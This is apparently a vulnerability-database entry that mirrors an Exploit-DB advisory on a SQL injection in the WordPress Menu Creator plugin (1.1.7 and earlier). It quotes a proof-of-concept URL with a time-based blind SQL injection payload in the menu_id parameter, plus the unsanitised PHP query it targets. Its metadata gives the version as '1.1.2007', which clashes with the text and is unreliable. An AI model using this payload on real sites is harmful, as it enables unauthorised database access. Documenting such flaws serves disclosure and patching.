header-logo
Suggest Exploit
vendor:
WordPress Menu Creator
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WordPress Menu Creator
Affected Version From: 1.1.2007
Affected Version To: 1.1.2007
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_menu_creator
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability

A SQL injection vulnerability exists in the WordPress Menu Creator plugin version 1.1.7 and earlier. The vulnerability is due to the updateSortOrder.php script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database.

Mitigation:

Upgrade to the latest version of the WordPress Menu Creator plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-menu-creator.1.1.7.zip
# Version: 1.1.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$menu_id = $_GET['menu_id'];
...
$first_item = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix."menuitems WHERE `order`=0 AND `parent`=0 AND menu = $menu_id");